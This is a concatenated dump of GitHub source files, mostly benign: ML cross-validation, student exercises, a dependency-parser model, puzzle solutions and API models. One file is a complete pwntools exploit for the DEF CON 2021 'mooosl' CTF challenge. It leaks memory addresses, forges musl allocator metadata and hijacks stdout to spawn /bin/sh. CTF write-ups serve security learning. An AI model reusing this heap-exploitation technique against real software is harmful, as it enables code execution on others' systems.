'clf8__learning_rate': ['adaptive'],\n }]\n\ngrid9 = [{\n \"clf9__loss\":[\"deviance\"],\n \"clf9__learning_rate\": [0.01, 0.025, 0.05, 0.075, 0.1, 0.15, 0.2],\n \"clf9__min_samples_split\": np.linspace(0.1, 0.5, 12),\n \"clf9__min_samples_leaf\": np.linspace(0.1, 0.5, 12),\n \"clf9__max_depth\":[3,5,8],\n \"clf9__max_features\":[\"log2\",\"sqrt\"],\n \"clf9__criterion\": [\"friedman_mse\", \"mse\"],\n \"clf9__subsample\":[0.5, 0.618, 0.8, 0.85, 0.9, 0.95, 1.0],\n \"clf9__n_estimators\":[10]\n }]\n\n# %%ssh -o 'PubkeyAuthentication=no' 'uhrinmat@147.32.83.226'\n\n# Setting up multiple GridSearchCV objects, 1 for each algorithm\ngridcvs = {}\ninner_cv = StratifiedKFold(n_splits=inner_splits, shuffle=True, random_state=1)\n\n# gcv = GridSearchCV(estimator=pipe8,\n# param_grid=param_grid8,\n# scoring='accuracy',\n# n_jobs=-1,\n# cv=inner_cv,\n# verbose=0,\n# refit=True)\n# gridcvs['MLP_STD'] = gcv\n\n# clf1 = LogisticRegression(multi_class='multinomial',\n# solver='newton-cg',\n# random_state=1)\n# clf2 = KNeighborsClassifier(algorithm='ball_tree',\n# leaf_size=50)\n# clf3 = DecisionTreeClassifier(random_state=1)\n# clf4 = SVC(random_state=1)\n# clf5 = RandomForestClassifier(random_state=1)\n# clf6 = ExtraTreesClassifier(random_state=1)\n#\n# clf8 = MLPClassifier(max_iter=10000,random_state=1)\n\n# clf9 = GradientBoostingClassifier(random_state=1)\n\nfor pgrid, est, name in zip((grid1, grid2, grid3, grid4, grid5, grid6, grid8, grid9),\n (pipe1, pipe2, pipe3, pipe4, pipe5, pipe6, pipe8, pipe9),\n ('lr', 'knn', 'dectree', 'svm', 'rf', 'extratree', 'mlp', 'gbm')):\n gcv = GridSearchCV(estimator=est,\n param_grid=pgrid,\n scoring='accuracy',\n n_jobs=-1,\n cv=inner_cv,\n verbose=0,\n refit=True)\n gridcvs[name] = gcv\n\n# %%\nouter_cv = StratifiedKFold(n_splits=outer_splits, shuffle=True, random_state=1)\n\n\n\nscoring = {\"accuracy\": \"accuracy\",\n \"balanced_accuracy\": \"balanced_accuracy\",\n \"neg_log_loss\": \"neg_log_loss\",\n \"st_kl_score\": st_kl_scorer,\n \"log_loss\": log_loss_scorer\n }\n\nscore_dicts = []\nfor name, gs_est in sorted(gridcvs.items()):\n scores_dict = cross_validate(gs_est,\n X=X_train,\n y=y_train,\n cv=outer_cv,\n return_estimator=True,\n scoring=scoring,\n n_jobs=6)\n\n print(50 * '-', '\\n')\n print('Algorithm:', name)\n print(' Inner loop:')\n\n score_dicts.append(scores_dict)\n\n for i in range(scores_dict['test_accuracy'].shape[0]):\n print('\\n Best ACC (avg. 
of inner test folds) %.2f%%' % (scores_dict['estimator'][i].best_score_ * 100))\n print(' Best parameters:', scores_dict['estimator'][i].best_estimator_)\n print(' ACC (on outer test fold) %.2f%%' % (scores_dict['test_accuracy'][i] * 100))\n\n print('\\n%s | outer ACC %.2f%% +/- %.2f' %\n (name, scores_dict['test_accuracy'].mean() * 100,\n scores_dict['test_accuracy'].std() * 100))\n\n print('\\n%s | outer B-ACC %.2f%% +/- %.2f' %\n (name, scores_dict['test_balanced_accuracy'].mean() * 100,\n scores_dict['test_balanced_accuracy'].std() * 100))\n\n print('\\n%s | negative LL %.2f +/- %.2f' %\n (name, scores_dict['test_neg_log_loss'].mean(),\n scores_dict['test_neg_log_loss'].std()))\n\n print('\\n%s | outer KL %.2f +/- %.2f' %\n (name, scores_dict['test_st_kl_score'].mean(),\n scores_dict['test_st_kl_score'].std()))\n\n print('\\n%s | outer log loss %.2f +/- %.2f' %\n (name, scores_dict['test_log_loss'].mean(),\n scores_dict['test_log_loss'].std()))\n\n# %%\npkl_dir = os.path.join(current_dir, '../pkl')\nfile_name = pkl_dir + \"/nest_cv_results.pkl\"\n\nopen_file = open(file_name, \"wb\")\npickle.dump(score_dicts, open_file)\nopen_file.close()\n\nopen_file = open(file_name, \"rb\")\nloaded_list = pickle.load(open_file)\nopen_file.close()\n\nprint(loaded_list)\n# %%\n# gcv_model_select = GridSearchCV(estimator=pipe5,\n# param_grid=param_grid5,\n# scoring='accuracy',\n# n_jobs=8,\n# cv=inner_cv,\n# verbose=1,\n# refit=False)\n#\n# gcv_model_select.fit(X_train, y_train)\n\n# %%\n# best_model = gcv_model_select.best_estimator_\n\n## We can skip the next step because we set refit=True\n## so scikit-learn has already fit the model to the\n## whole training set\n\n# best_model.fit(X_train, y_train)\n\n\n# train_acc = accuracy_score(y_true=y_train, y_pred=best_model.predict(X_train))\n# test_acc = accuracy_score(y_true=y_test, y_pred=best_model.predict(X_test))\n#\n# print('Accuracy %.2f%% (average over k-fold CV test folds)' %\n# (100 * gcv_model_select.best_score_))\n# print('Best Parameters: %s' % gcv_model_select.best_params_)\n#\n# print('Training Accuracy: %.2f%%' % (100 * train_acc))\n# print('Test Accuracy: %.2f%%' % (100 * test_acc))\n","repo_name":"mat-ej/mma","sub_path":"scripts/nested_cv.py","file_name":"nested_cv.py","file_ext":"py","file_size_in_byte":14088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"20104569225","text":"\"\"\"\n9. 
Write a Python script to print indices of all occurrences of a given element in a given\nlist.\n\"\"\"\n\nList = [1, 2, 2, 3, 2, 45]\nprint(List)\nFre = 0\nNumber = int(input(\"Enter The Number Which Is Vailiable In List: \"))\nfor i in List:\n if (Number== i):\n print(\"Index No: \", Fre)\n Fre += 1\n\nelse:\n print(List)","repo_name":"PushpakKhadke/Python-Assignment","sub_path":"Assignment14/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"57"} +{"seq_id":"30674386224","text":"#!/usr/bin/env python3\nfrom pwn import *\nimport random\nimport string\nimport codecs\n\nif len(sys.argv) == 1:\n s = process('./libc.so ./mooosl', shell=True)\nelse:\n s = remote('mooosl.challenges.ooo', 23333)\n\ndef store(key_content, value_content, key_size=None, value_size=None, wait=True):\n s.sendlineafter('option: ', '1')\n if key_size is None:\n key_size = len(key_content)\n s.sendlineafter('size: ', str(key_size))\n s.sendafter('content: ', key_content)\n if value_size is None:\n value_size = len(value_content)\n s.sendlineafter('size: ', str(value_size))\n if wait:\n s.recvuntil('content: ')\n s.send(value_content)\n\ndef query(key_content, key_size=None, wait=True):\n s.sendlineafter('option: ', '2')\n if key_size is None:\n key_size = len(key_content)\n s.sendlineafter('size: ', str(key_size))\n if wait:\n s.recvuntil('content: ')\n s.send(key_content)\n\ndef delete(key_content, key_size=None):\n s.sendlineafter('option: ', '3')\n if key_size is None:\n key_size = len(key_content)\n s.sendlineafter('size: ', str(key_size))\n s.sendafter('content: ', key_content)\n\ndef get_hash(content):\n x = 0x7e5\n for c in content:\n x = ord(c) + x * 0x13377331\n return x & 0xfff\n\ndef find_key(length=0x10, h=0x7e5):\n while True:\n x = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))\n if get_hash(x) == h:\n return x\n\nlibc = ELF('./libc.so')\n\nstore('A', 'A')\nfor _ in range(5):\n query('A' * 0x30)\nstore('\\n', 'A' * 0x30)\nstore(find_key(), 'A')\ndelete('\\n')\nfor _ in range(3):\n query('A' * 0x30)\nstore('A\\n', 'A', 0x1200)\nquery('\\n')\nres = codecs.decode(s.recvline(False).split(b':')[1], 'hex')\nmmap_base = u64(res[:8]) - 0x20\nlog.info('mmap base: %#x' % mmap_base)\nchunk_addr = u64(res[8:0x10])\nlog.info('chunk address: %#x' % chunk_addr)\n\nfor _ in range(3):\n query('A' * 0x30)\nquery(p64(0) + p64(chunk_addr - 0x60) + p64(0) + p64(0x20) + p64(0x7e5) + p64(0))\nquery('\\n')\nheap_base = u64(codecs.decode(s.recvline(False).split(b':')[1], 'hex')[:8]) - 0x1d0\nlog.info('heap base: %#x' % heap_base)\n\nfor _ in range(3):\n query('A' * 0x30)\nquery(p64(0) + p64(heap_base + 0xf0) + p64(0) + p64(0x200) + p64(0x7e5) + p64(0))\nquery('\\n')\nlibc.address = u64(codecs.decode(s.recvline(False).split(b':')[1], 'hex')[:8]) - 0xb7040\nlog.info('libc base: %#x' % libc.address)\n\nfor _ in range(3):\n query('A' * 0x30)\nquery(p64(0) + p64(next(libc.search(b'/bin/sh\\0'))) + p64(0) + p64(0x20) + p64(0x7e5) + p64(0))\nquery('\\n')\nassert codecs.decode(s.recvline(False).split(b':')[1], 'hex')[:8] == b'/bin/sh\\0'\n\nfor _ in range(3):\n query('A' * 0x30)\nquery(p64(0) + p64(heap_base) + p64(0) + p64(0x20) + p64(0x7e5) + p64(0))\nquery('\\n')\nsecret = u64(codecs.decode(s.recvline(False).split(b':')[1], 'hex')[:8])\nlog.info('secret: %#x' % secret)\n\nfake_meta_addr = mmap_base + 0x2010\nfake_mem_addr = mmap_base + 0x2040\nstdout = libc.address + 0xb4280\n\n# Overwrite 
stdout-0x10 to fake_meta_addr using dequeue during free\nsc = 8 # 0x90\nfreeable = 1\nlast_idx = 0\nmaplen = 1\nfake_meta = b''\nfake_meta += p64(stdout - 0x18) # prev\nfake_meta += p64(fake_meta_addr + 0x30) # next\nfake_meta += p64(fake_mem_addr) # mem\nfake_meta += p32(0) + p32(0) # avail_mask, freed_mask\nfake_meta += p64((maplen << 12) | (sc << 6) | (freeable << 5) | last_idx)\nfake_meta += p64(0)\n\nfake_mem = b''\nfake_mem += p64(fake_meta_addr) # meta\nfake_mem += p32(1) # active_idx\nfake_mem += p32(0)\n\npayload = b''\npayload += b'A' * 0xaa0\npayload += p64(secret) + p64(0)\npayload += fake_meta\npayload += fake_mem\npayload += b'\\n'\n\nfor _ in range(2):\n query('A' * 0x30)\nquery(payload, 0x1200)\nstore('A', p64(0) + p64(fake_mem_addr + 0x10) + p64(0) + p64(0x20) + p64(0x7e5) + p64(0))\ndelete('\\n')\n\n# Create a fake bin using enqueue during free\nsc = 8 # 0x90\nlast_idx = 1\nfake_meta = b''\nfake_meta += p64(0) # prev\nfake_meta += p64(0) # next\nfake_meta += p64(fake_mem_addr) # mem\nfake_meta += p32(0) + p32(0) # avail_mask, freed_mask\nfake_meta += p64((sc << 6) | last_idx)\nfake_meta += p64(0)\n\nfake_mem = b''\nfake_mem += p64(fake_meta_addr) # meta\nfake_mem += p32(1) # active_idx\nfake_mem += p32(0)\n\npayload = b''\npayload += b'A' * 0xa90\npayload += p64(secret) + p64(0)\npayload += fake_meta\npayload += fake_mem\npayload += b'\\n'\n\nquery('A' * 0x30)\nquery(payload, 0x1200)\nstore('A', p64(0) + p64(fake_mem_addr + 0x10) + p64(0) + p64(0x20) + p64(0x7e5) + p64(0))\ndelete('\\n')\n\n# Overwrite the fake bin so that it points to stdout\nfake_meta = b''\nfake_meta += p64(fake_meta_addr) # prev\nfake_meta += p64(fake_meta_addr) # next\nfake_meta += p64(stdout - 0x10) # mem\nfake_meta += p32(1) + p32(0) # avail_mask, freed_mask\nfake_meta += p64((sc << 6) | last_idx)\nfake_meta += b'A' * 0x18\nfake_meta += p64(stdout - 0x10)\n\npayload = b''\npayload += b'A' * 0xa80\npayload += p64(secret) + p64(0)\npayload += fake_meta\npayload += b'\\n'\nquery(payload, 0x1200)\n\n# Call calloc(0x80) which returns stdout and call system(\"/bin/sh\") by overwriting vtable\npayload = b''\npayload += b'/bin/sh\\0'\npayload += b'A' * 0x20\npayload += p64(heap_base + 1)\npayload += b'A' * 8\npayload += p64(heap_base)\npayload += b'A' * 8\npayload += p64(libc.symbols['system'])\npayload += b'A' * 0x3c\npayload += p32((1<<32)-1)\npayload += b'\\n'\nstore('A', payload, value_size=0x80, wait=False)\n\ns.interactive()\n","repo_name":"hnoson/writeups","sub_path":"defconctf/2021/mooosl/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"57"} +{"seq_id":"878646816","text":"import collections\n\n\ndef parse_cards(inputfile):\n with open(inputfile) as f:\n data = f.read()\n player1, player2 = data.split(\"\\n\\n\")\n player1_deck = collections.deque()\n for line in player1.splitlines():\n try:\n v = int(line.strip())\n except Exception:\n v = None\n if v:\n player1_deck.appendleft(v)\n player2_deck = collections.deque()\n for line in player2.splitlines():\n try:\n v = int(line.strip())\n except Exception:\n v = None\n if v:\n player2_deck.appendleft(v)\n return player1_deck, player2_deck\n\n\ndef main():\n player1_deck, player2_deck = parse_cards(\"input\")\n while player1_deck and player2_deck:\n card1 = player1_deck.pop()\n card2 = player2_deck.pop()\n if card1 > card2:\n player1_deck.extendleft([card1, card2])\n elif card2 > card1:\n player2_deck.extendleft([card2, card1])\n 
else:\n raise Exception(\"equal values\")\n winner = player1_deck or player2_deck\n score = sum((i + 1) * card for i, card in enumerate(winner))\n print(score)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"elemoine/adventofcode","sub_path":"2020/day22/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"26960711965","text":"import torch\nimport torch.nn as nn\nfrom supar.model import Model\nfrom supar.modules import MLP, DecoderLSTM\nfrom supar.utils import Config\nfrom typing import Tuple, List\n\nclass ArcEagerDependencyModel(Model):\n\n def __init__(self,\n n_words,\n n_transitions,\n n_trels,\n n_tags=None,\n n_chars=None,\n encoder='lstm',\n feat=['char'],\n n_embed=100,\n n_pretrained=100,\n n_feat_embed=100,\n n_char_embed=50,\n n_char_hidden=100,\n char_pad_index=0,\n elmo='original_5b',\n elmo_bos_eos=(True, False),\n bert=None,\n n_bert_layers=4,\n mix_dropout=.0,\n bert_pooling='mean',\n bert_pad_index=0,\n finetune=False,\n n_plm_embed=0,\n embed_dropout=.33,\n n_encoder_hidden=800,\n n_encoder_layers=3,\n encoder_dropout=.33,\n n_arc_mlp=500,\n n_rel_mlp=100,\n mlp_dropout=.33,\n scale=0,\n pad_index=0,\n unk_index=1,\n n_decoder_layers=4,\n **kwargs):\n super().__init__(**Config().update(locals()))\n\n # create decoder for buffer front, stack top and rels\n self.transition_decoder = self.rel_decoder = None, None\n\n stack_size, buffer_size = [self.args.n_encoder_hidden//2] * 2 if (self.args.n_encoder_hidden % 2) == 0 \\\n else [self.args.n_encoder_hidden//2, self.args.n_encoder_hidden//2+1]\n\n # create projection to reduce dimensionality of the encoder\n self.stack_proj = MLP(\n n_in=self.args.n_encoder_hidden, n_out=stack_size,\n dropout=mlp_dropout)\n self.buffer_proj = MLP(\n n_in=self.args.n_encoder_hidden, n_out=buffer_size,\n dropout=mlp_dropout\n )\n\n if self.args.decoder == 'lstm':\n decoder = lambda out_dim: DecoderLSTM(\n input_size=self.args.n_encoder_hidden, hidden_size=self.args.n_encoder_hidden,\n num_layers=self.args.n_decoder_layers, dropout=mlp_dropout,\n output_size=out_dim\n )\n else:\n decoder = lambda out_dim: MLP(\n n_in=self.args.n_encoder_hidden, n_out=out_dim, dropout=mlp_dropout\n )\n\n self.transition_decoder = decoder(n_transitions)\n self.trel_decoder = decoder(n_trels)\n\n # create delay projection\n if self.args.delay != 0:\n self.delay_proj = MLP(n_in=self.args.n_encoder_hidden * (self.args.delay + 1),\n n_out=self.args.n_encoder_hidden, dropout=mlp_dropout)\n\n # create PoS tagger\n if self.args.encoder == 'lstm':\n self.pos_tagger = DecoderLSTM(\n input_size=self.args.n_encoder_hidden, hidden_size=self.args.n_encoder_hidden, output_size=self.args.n_tags, num_layers=1, dropout=mlp_dropout\n )\n else:\n self.pos_tagger = nn.Identity()\n\n self.criterion = nn.CrossEntropyLoss()\n\n def encoder_forward(self, words: torch.Tensor, feats: List[torch.Tensor]) -> Tuple[torch.Tensor]:\n \"\"\"\n Applies encoding forward pass. 
Maps a tensor of word indices (`words`) to their corresponding neural\n representation.\n Args:\n words: torch.IntTensor ~ [batch_size, bos + pad(seq_len) + eos + delay]\n feats: List[torch.Tensor]\n lens: List[int]\n\n Returns: x, qloss\n x: torch.FloatTensor ~ [batch_size, bos + pad(seq_len) + eos, embed_dim]\n qloss: torch.FloatTensor ~ 1\n\n \"\"\"\n x = super().encode(words, feats)\n s_tag = self.pos_tagger(x[:, 1:-(1+self.args.delay), :])\n\n # adjust lengths to allow delay predictions\n # x ~ [batch_size, bos + pad(seq_len) + eos, embed_dim]\n if self.args.delay != 0:\n x = torch.cat([x[:, i:(x.shape[1] - self.args.delay + i), :] for i in range(self.args.delay + 1)], dim=2)\n x = self.delay_proj(x)\n\n # pass through vector quantization\n x, qloss = self.vq_forward(x)\n return x, s_tag, qloss\n\n def decoder_forward(self, x: torch.Tensor, stack_top: torch.Tensor, buffer_front: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Args:\n x: torch.FloatTensor ~ [batch_size, bos + pad(seq_len) + eos, embed_dim]\n stack_top: torch.IntTensor ~ [batch_size, pad(tr_len)]\n buffer_front: torch.IntTensor ~ [batch_size, pad(tr_len)]\n\n Returns: s_transition, s_trel\n s_transition: torch.FloatTensor ~ [batch_size, pad(tr_len), n_transitions]\n s_trel: torch.FloatTensor ~ [batch_size, pad(tr_len), n_trels]\n \"\"\"\n batch_size = x.shape[0]\n\n # obtain encoded embeddings for stack_top and buffer_front\n stack_top = torch.stack([x[i, stack_top[i], :] for i in range(batch_size)])\n buffer_front = torch.stack([x[i, buffer_front[i], :] for i in range(batch_size)])\n\n # pass through projections\n stack_top = self.stack_proj(stack_top)\n buffer_front = self.buffer_proj(buffer_front)\n\n # stack_top ~ [batch_size, pad(tr_len), embed_dim//2]\n # buffer_front ~ [batch_size, pad(tr_len), embed_dim//2]\n # x ~ [batch_size, pad(tr_len), embed_dim]\n x = torch.concat([stack_top, buffer_front], dim=-1)\n\n # s_transition ~ [batch_size, pad(tr_len), n_transitions]\n # s_trel = [batch_size, pad(tr_len), n_trels]\n s_transition = self.transition_decoder(x)\n s_trel = self.trel_decoder(x)\n\n return s_transition, s_trel\n\n def forward(self, words: torch.Tensor, stack_top: torch.Tensor, buffer_front: torch.Tensor, feats: List[torch.Tensor]) -> Tuple[torch.Tensor]:\n \"\"\"\n Args:\n words: torch.IntTensor ~ [batch_size, bos + pad(seq_len) + eos + delay].\n stack_top: torch.IntTensor ~ [batch_size, pad(tr_len)]\n buffer_front: torch.IntTensor ~ [batch_size, pad(tr_len)]\n feats: List[torch.Tensor]\n\n Returns: s_transition, s_trel, qloss\n s_transition: torch.FloatTensor ~ [batch_size, pad(tr_len), n_transitions]\n s_trel: torch.FloatTensor ~ [batch_size, pad(tr_len), n_trels]\n qloss: torch.FloatTensor ~ 1\n \"\"\"\n x, s_tag, qloss = self.encoder_forward(words, feats)\n s_transition, s_trel = self.decoder_forward(x, stack_top, buffer_front)\n return s_transition, s_trel, s_tag, qloss\n\n def decode(self, s_transition: torch.Tensor, s_trel: torch.Tensor, exclude: list = None):\n transition_preds = s_transition.argsort(-1, descending=True)\n if exclude:\n s_trel[:, :, exclude] = -1\n trel_preds = s_trel.argmax(-1)\n return transition_preds, trel_preds\n\n def loss(self, s_transition: torch.Tensor, s_trel: torch.Tensor, s_tag,\n transitions: torch.Tensor, trels: torch.Tensor, tags,\n smask: torch.Tensor, trmask: torch.Tensor, TRANSITION):\n s_transition, transitions = s_transition[trmask], transitions[trmask]\n s_trel, trels = s_trel[trmask], trels[trmask]\n\n # remove those values in trels that correspond to shift 
and reduce actions\n transition_pred = TRANSITION.vocab[s_transition.argmax(-1).flatten().tolist()]\n trel_mask = torch.tensor(list(map(lambda x: x not in ['reduce', 'shift'], transition_pred)))\n s_trel, trels = s_trel[trel_mask], trels[trel_mask]\n\n tag_loss = self.criterion(s_tag[smask], tags[smask]) if self.args.encoder == 'lstm' else torch.tensor(0).cuda()\n transition_loss = self.criterion(s_transition, transitions)\n trel_loss = self.criterion(s_trel, trels)\n\n return transition_loss + trel_loss + tag_loss\n","repo_name":"anaezquerro/incpar","sub_path":"supar/models/dep/eager/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8036,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"29553059587","text":"size_x = 600\nsize_y = 600\n\n# circle\ncircle_x = 300\ncircle_y = 300\ncircle_rad = 75\n\n# spaceship\nspaceship_x = 300\nspaceship_y = 300\nx_vel = 0\ny_vel = 0\nthrust_factor = 0\nrotation = 0\n\ndef setup():\n size(size_x, size_y)\n strokeWeight(3)\n colorMode(RGB, 1)\n\ndef draw():\n background(0)\n\n # draw blue circle\n global circle_y\n circle_y = circle_y + 1\n if circle_y > size_y + circle_rad:\n circle_y = circle_y - size_y\n elif circle_y > size_y - circle_rad:\n draw_circle_2(circle_y - size_y)\n draw_circle_2(circle_y)\n\n # draw spaceship\n global rotation\n draw_spaceship()\n\n # draw gray circles\n global circle_x\n # resume the space\n translate(-spaceship_x, -spaceship_y)\n circle_x = circle_x + 1\n if circle_x > size_x + circle_rad:\n circle_x = circle_x - size_x\n elif circle_x > size_x - circle_rad:\n draw_circle_1(circle_x - size_x)\n draw_circle_3(circle_x - size_x)\n draw_circle_1(circle_x)\n draw_circle_3(circle_x)\n \ndef draw_circle_1(x):\n fill(0.5, 0.5, 0.5)\n stroke(1.0, 1.0, 1.0)\n ellipse(x, 100, circle_rad*2, circle_rad*2)\n\ndef draw_circle_2(y):\n fill(0.8, 0.9, 1.0)\n stroke(1.0, 1.0, 1.0)\n ellipse(300, y, circle_rad*2, circle_rad*2)\n\ndef draw_circle_3(x):\n fill(0.5, 0.5, 0.5)\n stroke(1.0, 1.0, 1.0)\n ellipse(x, 500, circle_rad*2, circle_rad*2)\n \ndef keyPressed():\n global rotation\n global thrust_factor\n if (key == CODED):\n if keyCode == UP:\n thrust_factor = 0.5\n if keyCode == RIGHT:\n rotation += 3\n if keyCode == LEFT:\n rotation -= 3\n\ndef draw_spaceship():\n global spaceship_x\n global spaceship_y\n global x_vel\n global y_vel\n global thrust_factor\n global rotation\n x_vel = (x_vel + sin(radians(rotation))) * thrust_factor\n y_vel = (y_vel - cos(radians(rotation))) * thrust_factor\n \n spaceship_x = spaceship_x + x_vel\n spaceship_y = spaceship_y + y_vel\n translate(spaceship_x, spaceship_y)\n rotate(radians(rotation))\n fill(0)\n stroke(1)\n strokeWeight(3)\n triangle(-16, 10, 0, -30, 16, 10)\n # resume rotate\n rotate(radians(-rotation))\n","repo_name":"yinxx2019/python","sub_path":"lab10/asteroids/asteroids.pyde","file_name":"asteroids.pyde","file_ext":"pyde","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"1278375504","text":"def main():\n T = int(input())\n\n results = {}\n\n for _ in range(T):\n N = int(input())\n\n if N in results:\n print(results[N])\n continue\n\n lowest = N\n highest = N\n\n while True:\n #print(lowest, highest)\n if is_prime(lowest) and is_prime(highest):\n results[N] = str(lowest) + \" \" + str(highest)\n break\n\n lowest -= 1\n highest += 1\n\n print(results[N])\n\n\n# from 
https://stackoverflow.com/questions/15285534/isprime-function-for-python-language\ndef is_prime(number):\n if number == 2 or number == 3: return True\n if number < 2 or number % 2 == 0: return False\n if number < 9:\n return True\n if number % 3 == 0:\n return False\n r = int(number ** 0.5)\n f = 5\n while f <= r:\n if number % f == 0:\n return False\n if number % (f + 2) == 0:\n return False\n f += 6\n return True\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"staadecker/contest-practice","sub_path":"CCC/2019/s2.py","file_name":"s2.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"15912083174","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom openapi_server.models.base_model_ import Model\nfrom openapi_server import util\n\n\nclass MnsInfoSingle(Model):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).\n\n Do not edit the class manually.\n \"\"\"\n\n def __init__(self, mns_label=None, mns_type=None, mns_version=None, mns_address=None, mns_scope=None): # noqa: E501\n \"\"\"MnsInfoSingle - a model defined in OpenAPI\n\n :param mns_label: The mns_label of this MnsInfoSingle. # noqa: E501\n :type mns_label: str\n :param mns_type: The mns_type of this MnsInfoSingle. # noqa: E501\n :type mns_type: str\n :param mns_version: The mns_version of this MnsInfoSingle. # noqa: E501\n :type mns_version: str\n :param mns_address: The mns_address of this MnsInfoSingle. # noqa: E501\n :type mns_address: str\n :param mns_scope: The mns_scope of this MnsInfoSingle. # noqa: E501\n :type mns_scope: List[str]\n \"\"\"\n self.openapi_types = {\n 'mns_label': str,\n 'mns_type': str,\n 'mns_version': str,\n 'mns_address': str,\n 'mns_scope': List[str]\n }\n\n self.attribute_map = {\n 'mns_label': 'mnsLabel',\n 'mns_type': 'mnsType',\n 'mns_version': 'mnsVersion',\n 'mns_address': 'mnsAddress',\n 'mns_scope': 'mnsScope'\n }\n\n self._mns_label = mns_label\n self._mns_type = mns_type\n self._mns_version = mns_version\n self._mns_address = mns_address\n self._mns_scope = mns_scope\n\n @classmethod\n def from_dict(cls, dikt) -> 'MnsInfoSingle':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The MnsInfo-Single of this MnsInfoSingle. 
# noqa: E501\n :rtype: MnsInfoSingle\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def mns_label(self):\n \"\"\"Gets the mns_label of this MnsInfoSingle.\n\n\n :return: The mns_label of this MnsInfoSingle.\n :rtype: str\n \"\"\"\n return self._mns_label\n\n @mns_label.setter\n def mns_label(self, mns_label):\n \"\"\"Sets the mns_label of this MnsInfoSingle.\n\n\n :param mns_label: The mns_label of this MnsInfoSingle.\n :type mns_label: str\n \"\"\"\n\n self._mns_label = mns_label\n\n @property\n def mns_type(self):\n \"\"\"Gets the mns_type of this MnsInfoSingle.\n\n\n :return: The mns_type of this MnsInfoSingle.\n :rtype: str\n \"\"\"\n return self._mns_type\n\n @mns_type.setter\n def mns_type(self, mns_type):\n \"\"\"Sets the mns_type of this MnsInfoSingle.\n\n\n :param mns_type: The mns_type of this MnsInfoSingle.\n :type mns_type: str\n \"\"\"\n allowed_values = [\"ProvMnS\", \"FaultSupervisionMnS\", \"StreamingDataReportingMnS\", \"FileDataReportingMnS\"] # noqa: E501\n if mns_type not in allowed_values:\n raise ValueError(\n \"Invalid value for `mns_type` ({0}), must be one of {1}\"\n .format(mns_type, allowed_values)\n )\n\n self._mns_type = mns_type\n\n @property\n def mns_version(self):\n \"\"\"Gets the mns_version of this MnsInfoSingle.\n\n\n :return: The mns_version of this MnsInfoSingle.\n :rtype: str\n \"\"\"\n return self._mns_version\n\n @mns_version.setter\n def mns_version(self, mns_version):\n \"\"\"Sets the mns_version of this MnsInfoSingle.\n\n\n :param mns_version: The mns_version of this MnsInfoSingle.\n :type mns_version: str\n \"\"\"\n\n self._mns_version = mns_version\n\n @property\n def mns_address(self):\n \"\"\"Gets the mns_address of this MnsInfoSingle.\n\n\n :return: The mns_address of this MnsInfoSingle.\n :rtype: str\n \"\"\"\n return self._mns_address\n\n @mns_address.setter\n def mns_address(self, mns_address):\n \"\"\"Sets the mns_address of this MnsInfoSingle.\n\n\n :param mns_address: The mns_address of this MnsInfoSingle.\n :type mns_address: str\n \"\"\"\n\n self._mns_address = mns_address\n\n @property\n def mns_scope(self):\n \"\"\"Gets the mns_scope of this MnsInfoSingle.\n\n List of the managed object instances that can be accessed using the MnS. If a complete SubNetwork can be accessed using the MnS, this attribute may contain the DN of the SubNetwork instead of the DNs of the individual managed entities within the SubNetwork. # noqa: E501\n\n :return: The mns_scope of this MnsInfoSingle.\n :rtype: List[str]\n \"\"\"\n return self._mns_scope\n\n @mns_scope.setter\n def mns_scope(self, mns_scope):\n \"\"\"Sets the mns_scope of this MnsInfoSingle.\n\n List of the managed object instances that can be accessed using the MnS. If a complete SubNetwork can be accessed using the MnS, this attribute may contain the DN of the SubNetwork instead of the DNs of the individual managed entities within the SubNetwork. 
# noqa: E501\n\n :param mns_scope: The mns_scope of this MnsInfoSingle.\n :type mns_scope: List[str]\n \"\"\"\n\n self._mns_scope = mns_scope\n","repo_name":"juanmagal/slicenr-server-flask","sub_path":"openapi_server/models/mns_info_single.py","file_name":"mns_info_single.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"28599123786","text":"\"\"\"\nModules can be enabled & disabled from the web UI\nModules can be configured from the web UI\n\"\"\"\nfrom __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Any, Optional\n\nimport json\nimport logging\n\nfrom pajbot.managers.db import Base, DBManager\nfrom pajbot.utils import find\n\nfrom sqlalchemy import Text\nfrom sqlalchemy.orm import Mapped, mapped_column\n\nif TYPE_CHECKING:\n from pajbot.bot import Bot\n from pajbot.models.sock import HandlerParam, SocketManager\n from pajbot.modules.base import BaseModule\n\nlog = logging.getLogger(\"pajbot\")\n\n\nclass Module(Base):\n __tablename__ = \"module\"\n\n id: Mapped[str] = mapped_column(Text, primary_key=True)\n enabled: Mapped[bool]\n settings: Mapped[Optional[str]]\n\n def __init__(self, module_id: str, **options: Any) -> None:\n self.id = module_id\n self.enabled = options.get(\"enabled\", False)\n self.settings = None\n\n\nclass ModuleManager:\n def __init__(self, socket_manager: Optional[SocketManager], bot: Optional[Bot] = None) -> None:\n # List of all enabled 